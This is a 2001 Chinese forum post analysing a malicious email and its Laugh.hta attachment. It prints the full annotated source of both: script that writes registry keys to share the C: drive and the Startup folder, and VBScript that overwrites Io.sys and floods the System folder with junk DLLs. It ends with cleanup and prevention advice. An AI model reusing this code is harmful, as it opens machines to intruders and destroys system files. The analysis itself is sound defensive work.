computer 版 (精华区)

发信人: neverbw (一切随缘), 信区: network
标  题: 不明邮件是如何共享你的硬盘的
发信站: 听涛站 (2001年11月30日14:51:39 星期五), 站内信件

最近网络上的邮件病毒满天飞舞，令人防不胜防。小弟的邮箱地址也不知怎么被添加到
几份邮件列表中，结果现在平均下来收10封信有8封垃圾邮件。不光是广告，而且最近常
有一些不明身份的邮件发到我的邮箱来，并且都带有附件，通常附件为doc和exe文件。
可恶！看来不是SirCam病毒就是“求职信”病毒。Foxmail的过滤器也是杯水车薪——S
pammer每天都从新的原地址发来垃圾邮件。每天收信都战战兢兢，就像是在排雷！
　　忽一日，好友打电话来求救，说机器不能启动了。我一听，就拿着工具软件一路小
跑到他家，也不多问——直接开机（好友刚学电脑不久，水平肯定……），一看“缺少
系统文件”，这简单，启动盘启动，“Sys A: C: ”搞定！重启，蓝天白云映入眼帘…
…“可能是有病毒吧，要不然系统文件会无故丢失？”我一边说一边操起鼠标。“怎么
启动速度这么慢？”我问他，他摇摇头后说“昨天收了信后就成这样了，我也不知道怎
么回事。”我打开Outlook Express，发现有封名为“笑林广记笑话集”的信不能读，O
E提示说上一次没有正常退出，可能是由看过的最后一封邮件所引起的。我就点击“查看
此邮件”，里面有一个名为Laugh.hta的附件，我试着一执行，结果硬盘灯狂闪。不对头
！我立即按下三键，在任务列表中没有发现邮件病毒常见的WScript进程，倒是多了一个
MSHTA的不明进程。这个进程肯定有问题，马上用“Windows优化大师”中的进程管理器
杀掉了它——果然，硬盘不响了。
　　朋友说他也点过这个附件。我就打开资源管理器，首先发现C盘的盘符上有一只手托
着——C盘被共享了！莫名其妙，马上改为不共享。接着又发现C盘根目录下的Io.sys大
小不对——由219K变成了3K，又被病毒写坏了！我这回得好好研究你一下！再打开OE，
不理会OE的关于上一次没有正常退出提示，直接双击该可疑邮件，点击菜单上的“查看
”——“编辑源文件”，终于看到了它的庐山真面目。
〈!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"〉
〈HTML〉〈HEAD〉
〈META content="text/html; charset=gb2312" http-equiv=Content-Type〉
〈META content="MSHTML 5.00.2614.3500" name=GENERATOR〉
〈STYLE〉〈/STYLE〉
〈/HEAD〉
〈BODY bgColor=#c0c0c0〉
〈DIV align=center〉〈FONT size=4〉〈STRONG〉笑林广记笑话集〈/STRONG〉〈/FON
T〉〈/DIV〉
〈DIV align=center〉 〈/DIV〉
〈DIV align=left〉〈FONT size=2〉
你好！我们是笑林广记笑话网，这里有大量的XXX级笑话，绝对笑死你！欢迎访问！附件
中有极品笑话N篇，友情赠送！〈A href="http://www.sexlaugh.com.cn"〉Http://www
.sexlaugh.com.cn〈/A〉〈/FONT〉〈/DIV〉
〈script language=JavaScript〉
function f（）　//改写注册表的函数
{
var aa,ss;
aa=document.applets[0];
aa.setCLSID（"{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"）;
aa.createInstance（）;
ss=aa.GetObject（）;
ss.RegWrite（"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\C$\\Flags",302,"REG_DWORD"）;
ss.RegWrite（"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\C$\\Type",0,"REG_DWORD"）;
ss.RegWrite（"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan\\C$\\Path","C:\\"）;
}
function init（）
{
setTimeout（"f（）", 1000）;　//每过1000毫秒就再次递归调用f（）
}
init（）;　//调用函数
〈/script〉
〈/BODY〉〈/HTML〉
　　这封邮件就是利用了MS.ActiveX元件的写注册表的功能，只要你一读这封信，它就
会在注册表的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Network\LanMan中添加了一个键值C$，并且将C盘改为完全共享！这样黑客可以用SMB扫
描器直接登陆你的C盘，他可以在硬盘中随意拷贝文件，删除文件，添加文件……并且可
以给你上传木马，永久而全面地控制你的机器。
再来看一看附件Laugh.hta吧。我查看了一下“文件类型”，发现“.hta”后缀名其实是
HTML Application文件，可以由Mshta.exe解释执行。看来也是和WSH、VBS一样的文本文
件，就将它导出为Txt文件——哈哈！全看到了！
〈html〉
〈script language=vbs〉
On Error Resume Next·　容错语句，避免程序崩溃
set aa=CreateObject（"WScript.Shell"）·建立WScript对象
Set fs = CreateObject（"Scripting.FileSystemObject"）·建立文件系统对象
Set dir1 = fs.GetSpecialFolder（0）·得到Windows路径
Set dir2 = fs.GetSpecialFolder（1）·得到System路径
dir1=dir1+"\START MENU\PROGRAMS\启动"
aa.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersion\
Network\LanMan\S$\Flags",302,"REG_DWORD"·写入Dword值Flags，这是共享类型的标
志
aa.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersion\
Network\LanMan\S$\Type",0,"REG_DWORD"·写入Dword值Type
aa.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersion\
Network\LanMan\S$\Path",dir1·写入共享资源的绝对路径
a=10
Set Os = CreateObject（"Scriptlet.TypeLib"）·建立自定义枚举对象
doc="“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We want pe
ace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、“Lo
ok at the pretty”、“Some advice on your shortcoming”、“Free XXX Pictures
”、“A free hot porn site”、“Why don’t you reply to me?”、“How about h
ave dinner with me together?”、“Never kiss a stranger”“Hi”、“Hello”、
“How are you?”、“Can you help me?”、“We want peace” 、“Where will you
 go?”、“Congratulations!!!”、“Don’t Cry”、“Look at the pretty”、“So
me advice on your shortcoming”、“Free XXX Pictures”、“A free hot porn si
te”、“Why don’t you reply to me?”、“How about have dinner with me toget
her?”、“Never kiss a stranger”“Hi”、“Hello”、“How are you?”、“Can 
you help me?”、“We want peace” 、“Where will you go?”、“Congratulation
s!!!”、“Don’t Cry”、“Look at the pretty”、“Some advice on your shortc
oming”、“Free XXX Pictures”、“A free hot porn site”、“Why don’t you r
eply to me?”、“How about have dinner with me together?”、“Never kiss a s
tranger”“Hi”、“Hello”、“How are you?”、“Can you help me?”、“We wan
t peace” 、“Where will you go?”、“Congratulations!!!”、“Don’t Cry”、
“Look at the pretty”、“Some advice on your shortcoming”、“Free XXX Pict
ures”、“A free hot porn site”、“Why don’t you reply to me?”“How about
 have dinner with me together?”"
·一堆垃圾码，以备写入目标文件
Os.Reset·重置TypeLib对象
Os.Path = "C:\Io.sys"·TypeLib对象的目标路径为C:\Io.sys
Os.Doc = doc·写入的内容——就是上面的一堆垃圾
Os.Write（）·写入！
while true
·死循环，垃圾文件越多越好
a=a+1
Os.Reset
Os.Path = dir2&"\Msvbvm"&a&".dll"
·目标路径为System下的Msvbvm???.dll文件
Os.Doc = doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&
doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&doc&d
oc&doc&doc&doc&doc&doc&doc&doc&doc&doc
　·大量重复，以生成足够大小的文件
Os.Write（）·生成文件！
wend
〈/script〉
〈/Html〉
没想到hta文件的权限比Html的权限还大一些，竟然可以调用FileSystemObject元件（文
件系统对象）。病毒首先得到你的Windows目录和System目录，再修改注册表，把你的启
动目录——"C:\WINDOWS\Start Menu\Programs\启动"设置为完全共享，这样就可以被黑
客搜到，上传一个“冰河”或者“广外女生”，你就掉的大了，而且你还被蒙在鼓里！
大家一般哪里会去查看启动目录啊！你好毒！你好毒！你好毒毒毒毒…… 然后病毒就把
目标对准System目录，往里面灌垃圾文件，都是形如Msvbvm???的Dll文件，而且所有VB
编写的程序都不能用了，提示找不到Dll文件——因为Msvbvm50.dll和Msvbvm60.dll被垃
圾文件覆盖了。
　　我马上查看了一下Windows目录，竟然有648M之大，垃圾文件成山！难怪启动那么慢
。只有查找Msvbvm*.dll，全部删除之（不知有没有误删的）。 然后删除带毒邮件（注
意：一定要在后面步骤之先删掉带毒邮件），再将共享的目录改回来，最后把Io.sys再
次覆盖一遍，OK！
　　防备方法：将ActiveX元件、Java脚本和Vbs脚本等全部禁止就可以避免Bingo。
　　具体方法是：在Internet Explorer菜单中点击“工具”——“Internet选项”，在
弹出的对话框中选择“安全”标签，再点击“自定义级别”按钮，就会弹出“安全设置
”对话框，把其中所有ActiveX控件以及Java和Vbs脚本相关全部选择“禁用”即可。不
过，这样做在以后的网页浏览过程中可能会造成一些善意使用脚本和控件的网站无法正
常浏览。嗯……当然最好是安装Norton AntiVirus，它会提醒你有不明超文本或程序写
你的注册表和磁盘，而且使用比较简单（非常适合好友这种菜鸟）。另外还有Lockdown
2000 Professional（注意：不是普通版，是专业版）也不错，是我看过的最为复杂，最
为强大的个人防火墙，不过它的资源占用率比Norton高得多。孰优孰劣，你自己看着办
吧。


         当爱情不再完美
         我宁愿选择无悔
        不管来生多么美丽
    我无法失去今生对你的记忆!

※ 来源:·听涛站 tingtao.dhs.org·[FROM: 匿名天使的家]